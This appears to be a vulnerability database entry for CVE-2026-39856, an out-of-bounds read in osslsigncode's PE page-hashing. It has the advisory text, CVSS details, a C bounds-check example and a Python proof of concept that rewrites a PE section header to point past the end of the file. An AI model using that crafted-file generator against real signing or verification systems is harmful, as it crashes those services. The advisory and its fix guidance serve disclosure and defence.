Security Vulnerability Report
CVE-2026-39856 CVSS 5.5 MEDIUM

CVE-2026-39856

Published: 2026-04-09 17:16:29
Last Modified: 2026-04-17 19:59:36

Description

osslsigncode is a tool that implements Authenticode signing and timestamping. Prior to 2.13, an out-of-bounds read vulnerability exists in osslsigncode version 2.12 and earlier in the PE page-hash computation code (pe_page_hash_calc()). When processing PE sections for page hashing, the function uses PointerToRawData and SizeOfRawData values from section headers without validating that the referenced region lies within the mapped file. An attacker can craft a PE file with section headers that point beyond the end of the file. When osslsigncode computes page hashes for such a file, it may attempt to hash data from an invalid memory region, causing an out-of-bounds read and potentially crashing the process. The vulnerability can be triggered while signing a malicious PE file with page hashing enabled (-ph), or while verifying a malicious signed PE file that already contains page hashes. Verification of an already signed file does not require the verifier to pass -ph. This vulnerability is fixed in 2.13.
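The missing validation described above, written out as an added example. This is not osslsigncode's actual patch; the struct and function names are hypothetical and the section values are constructed. The check uses subtraction so that `PointerToRawData + SizeOfRawData` is never computed and cannot wrap around.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical minimal view of the two IMAGE_SECTION_HEADER fields the advisory names. */
struct section_range {
    uint32_t pointer_to_raw_data;
    uint32_t size_of_raw_data;
};

/* Returns 1 if [ptr, ptr + size) lies inside a mapping of file_size bytes, else 0.
 * Written as a subtraction so ptr + size is never formed and cannot overflow. */
static int section_in_file(const struct section_range *s, size_t file_size)
{
    if (s->size_of_raw_data == 0)
        return 1;                   /* nothing to hash, so nothing is read */
    if ((size_t)s->pointer_to_raw_data > file_size)
        return 0;                   /* starts past end of file */
    return (size_t)s->size_of_raw_data <= file_size - s->pointer_to_raw_data;
}

/* Returns the index of the first section whose raw data falls outside
 * the file, or -1 if every section fits. */
static int first_bad_section(const struct section_range *secs, size_t count,
                             size_t file_size)
{
    for (size_t i = 0; i < count; i++)
        if (!section_in_file(&secs[i], file_size))
            return (int)i;
    return -1;
}

int main(void)
{
    /* Constructed sample: a 0x3000-byte file with three section headers. */
    const size_t file_size = 0x3000;
    const struct section_range secs[] = {
        { 0x0400, 0x1000 },         /* inside the file */
        { 0x2000, 0x1000 },         /* ends exactly at EOF: still valid */
        { 0x4000, 0x1000 },         /* starts past EOF: must be rejected */
    };
    int bad = first_bad_section(secs, 3, file_size);
    if (bad >= 0)
        printf("section %d: raw data outside file, refusing to page-hash\n", bad);
    return bad >= 0;
}
```

A signing or verification pipeline can run a check of this shape on untrusted PE input before any page-hash computation, and reject the file on the first failing section.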

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:osslsigncode_project:osslsigncode:*:*:*:*:*:*:*:* - VULNERABLE
osslsigncode <= 2.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import pefile
import sys

# Usage: python poc.py input.exe output.exe

def create_malicious_pe(input_path, output_path):
    try:
        # Load the original PE file
        pe = pefile.PE(input_path)

        # Check if there are sections
        if not pe.sections:
            print("No sections found in the PE file.")
            return

        # Modify the first section's PointerToRawData to point beyond the file size
        # This triggers the out-of-bounds read in osslsigncode during page hash calculation
        original_raw_size = pe.sections[0].SizeOfRawData
        file_size = pe.OPTIONAL_HEADER.SizeOfImage

        # Set PointerToRawData to a value outside the file (e.g., file_size + 0x1000)
        pe.sections[0].PointerToRawData = file_size + 0x1000
        pe.sections[0].SizeOfRawData = 0x1000

        # Write the modified PE file
        pe.write(output_path)

        print(f"Malicious PE file created at: {output_path}")
        print(f"Modified Section: {pe.sections[0].Name.decode()}")
        print(f"New PointerToRawData: {hex(pe.sections[0].PointerToRawData)}")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: python poc.py <input_exe> <output_exe>")
    else:
        create_malicious_pe(sys.argv[1], sys.argv[2])
```

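References

https://github.com/mtrojnar/osslsigncode/commit/92f8761b4770f76a36731969b5040ce3b9a09570 (Patch)
https://github.com/mtrojnar/osslsigncode/releases/tag/2.13 (Product, Release Notes)
https://github.com/mtrojnar/osslsigncode/security/advisories/GHSA-rjrx-chvw-8jw8 (Patch, Vendor Advisory)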

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39856", "sourceIdentifier": "[email protected]", "published": "2026-04-09T17:16:29.310", "lastModified": "2026-04-17T19:59:36.240", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "osslsigncode is a tool that implements Authenticode signing and timestamping. Prior to 2.13, an out-of-bounds read vulnerability exists in osslsigncode version 2.12 and earlier in the PE page-hash computation code (pe_page_hash_calc()). When processing PE sections for page hashing, the function uses PointerToRawData and SizeOfRawData values from section headers without validating that the referenced region lies within the mapped file. An attacker can craft a PE file with section headers that point beyond the end of the file. When osslsigncode computes page hashes for such a file, it may attempt to hash data from an invalid memory region, causing an out-of-bounds read and potentially crashing the process. The vulnerability can be triggered while signing a malicious PE file with page hashing enabled (-ph), or while verifying a malicious signed PE file that already contains page hashes. Verification of an already signed file does not require the verifier to pass -ph. This vulnerability is fixed in 2.13."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:osslsigncode_project:osslsigncode:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.13", "matchCriteriaId": "3F16716F-B2C3-41F9-B32B-CFD011129F12"}]}]}], "references": [{"url": "https://github.com/mtrojnar/osslsigncode/commit/92f8761b4770f76a36731969b5040ce3b9a09570", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/mtrojnar/osslsigncode/releases/tag/2.13", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/mtrojnar/osslsigncode/security/advisories/GHSA-rjrx-chvw-8jw8", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}